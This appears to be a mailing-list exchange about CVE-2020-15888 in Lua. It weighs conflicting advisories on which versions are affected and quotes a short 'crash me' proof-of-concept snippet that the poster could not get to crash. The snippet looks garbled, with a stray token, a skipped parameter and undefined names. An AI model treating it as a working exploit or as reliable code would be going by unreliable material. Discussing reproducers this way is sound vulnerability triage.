Re: patch for CVE-2020-15888

[aman agrawal <aman.161089@...>]

Hi Sam, 

I'm trying in FreeSD 11.4.

On Wed, 28 Jul, 2021, 6:44 pm Sam Trenholme, <lua@samiam.org> wrote:

> Reg CVE-2020-15888, in
> https://www.cybersecurity-help.cz/vulnerabilities/47700/
> <https://www.cybersecurity-help.cz/vulnerabilities/47700/>, it is
> mentioned that this CVE is present in version less than 5.4.0.

Indeed. According to that page, Lua 5.2.0 and up are vulnerable.
However, https://ubuntu.com/security/CVE-2020-15888
<https://ubuntu.com/security/CVE-2020-15888> claims that only Lua 5.4 is
affected.

The “crash me” code posted earlier in this thread (included below)
doesn’t crash any Lua versions I have tested against (Lua 5.1 in Cygwin,
my own Lunacy, Lua 5.3 in Cygwin, and Lua 5.3 in Ubuntu 20.04).

Is anyone else able to crash Lua with this code?

function errfunc(p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27,
                 p28, p29, p30, p31, p32, p33, p34, p35, p36, p37, p38, p39,
                 p40, p41, p42, p43, p44, p45, p46, p48, p49, p50, p51,
p52, p53, p54, p55, p56, p57, p58, p59, p60, ...) a9
                 'fail'
         end
         coroutine.wrap(function() xpcall(test,
                 function() do setmetatable({},
                         { __gc = function() if k < 2 then end end })
                 end
         end
         )
         xpcall(test, errfunc) end)()